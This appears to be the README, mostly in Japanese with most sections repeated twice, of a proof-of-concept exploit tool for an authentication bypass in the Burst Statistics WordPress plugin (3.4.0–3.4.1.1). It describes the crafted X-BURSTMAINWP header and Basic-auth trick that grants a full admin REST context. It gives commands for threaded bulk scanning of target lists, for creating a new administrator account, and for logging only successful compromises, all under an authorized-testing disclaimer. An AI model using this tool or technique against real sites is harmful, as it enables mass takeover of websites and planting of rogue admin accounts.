
CVE-2026-8181 PoC: Burst Statistics(3.4.0–3.4.1.1)の認証バイパス。Pythonツール — 単一・複数ターゲットのスキャン、スレッド化されたワーカー、TXTレポート。認可されたテストのみ。メンテナー: mürrez。
EN: Burst Statistics の認証バイパスに対する 許可を得たセキュリティテストのための管理された PoC と簡潔な技術メモ。
TR: Burst Statistics プラグインの認証バイパスに対する 許可を得たセキュリティテスト用の管理された PoC と簡潔な技術概要。
注: WordPress.org に表示されている 200,000 以上のアクティブインストール という数字は、このプラグインの ユーザー全体 の数を表しており、すべてのサイトが 脆弱なバージョン で動作していることを意味する わけではありません。実際の影響を評価するには、バージョンと環境(HTTP / アプリケーションパスワードの利用可否など)を確認する必要があります。
注: WordPress.org の 200,000 以上のアクティブインストール という数字はプラグインの 全ユーザー数 であり、サイトの すべてが脆弱なバージョン で動作していることを意味する ものではありません。実際の影響を判断するには、バージョンと環境(HTTP、アプリケーションパスワードの利用可否など)を確認する必要があります。
GitHub Flavored Markdown は、リポジトリ内にファイルがない場合、バイナリ GIF を埋め込むことができません。上記の Typing SVG スニペット(CDN)は動きを再現したものです。独自のスクリーンキャプチャを追加するには:

GitHub Markdown は、リポジトリ内にファイルがないと GIF の埋め込みをサポートしません。上記の Typing SVG(CDN)は文字アニメーションを表示します。独自のデモを追加するには:

flowchart LR
A[Client request] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Mis-handled branch| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: full admin context]
flowchart LR
A[İstek] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Yanlış dal| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: tam admin bağlamı]
-f 使用時、-o と --output-dir は併用できません。
-f モードでは、-o と --output-dir は同時に使用できません。
pip3 install requests urllib3
# Single site, report file
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k
# Single site + new admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k
# Bulk + combined file (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k
# Bulk + per-host files in folder (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k
# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k
# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: フィールドバイパスに成功しても、被害者ユーザーの実際のパスワードが漏洩することはありません — PoC 内の Basic パスワードは 偽物 です。--create-user で 新しい アカウントを作成した場合を除き、Password: 行は空のままです(その場合は生成されたパスワードが書き込まれます)。
バイパスに成功しても 既存ユーザーの実際のパスワードは漏洩しません — PoC 内の Basic パスワードは 偽物 です。--create-user で 新しい アカウントを作成しない限り Password: 行は空のままです。作成した場合は、生成されたパスワードが書き込まれます。
書面による許可を得た評価と ご自身のラボ のみで使用してください。無許可での使用は、多くの法域で違法です。著者およびこの README のメンテナーは、不正使用について 一切の責任を負いません。
書面による許可を得た評価と ご自身のラボ でのみ使用できます。無許可の使用は多くの国で 違法 です。著者およびこの README の編集者は、悪用について 責任を負いません。
| 項目 | 詳細 |
|---|
| 内容 | Burst Statistics の 認証バイパス(CWE-287): 細工されたヘッダーにより、REST リクエストを 完全な管理者コンテキスト に昇格させることができます。 |
| バージョン | 脆弱なバージョン: 3.4.0, 3.4.1, 3.4.1.1 · 推奨: 3.4.2 以降 |
| 重大度 | CVSS 約9.8(Critical)。該当する条件では、リモートかつ未認証で悪用可能。 |
| このリポジトリ | CVE-2026-8181.py — ラボ自動化: 単一ターゲット、バルクリスト、スレッドプール、選択的 TXT 出力。 |
| 項目 | 詳細 |
|---|
| 内容 | Burst Statistics の 認証バイパス(CWE-287)。特別に細工されたヘッダーにより、REST リクエストで 完全な管理者コンテキスト を取得します。 |
| バージョン | 影響を受けるバージョン: 3.4.0, 3.4.1, 3.4.1.1 · 推奨: 3.4.2 以降 |
| 重大度 | CVSS 約9.8(Critical)。該当する条件では、リモートかつ未認証で悪用可能。 |
| このリポジトリ | CVE-2026-8181.py — ラボ自動化: 単一ターゲット、リストスキャン、スレッドプール、選択的 TXT 出力。 |
| 機能 | 説明 |
|---|
| 単一ターゲット | -u ベース URL |
| 複数ターゲット | -f targets.txt(1 行に 1 URL、# はコメント) |
| 並列処理 | -j N ワーカー(上限あり) |
| 統合ファイル | -o file.txt — -f 使用時、成功した exploit のみ が追記されます |
| ホスト別ファイル | --output-dir — 成功したもののみ host.txt が生成されます(失敗はスキップ) |
| 新しい管理者 | --create-user — REST 経由でランダムなユーザーを作成(パスワードはレポートに表示されます) |
| TLS(ラボ) | -k 証明書検証を無効化(信頼できるラボのみ) |
| 機能 | 説明 |
|---|
| 単一ターゲット | -u ルート URL |
| 複数ターゲット | -f targets.txt(1 行に 1 URL、# はコメント) |
| 並列処理 | -j N ワーカー(上限あり) |
| 単一ファイル | -o dosya.txt — -f 使用時、成功した exploit のみ 追記 |
| フォルダ出力 | --output-dir — 成功したものだけ host.txt を生成(失敗はスキップ) |
| 新しい管理者 | --create-user — REST 経由でランダムなユーザーを作成(パスワードはレポートに表示) |
| TLS(ラボ) | -k 証明書検証を無効化(信頼できるラボのみ) |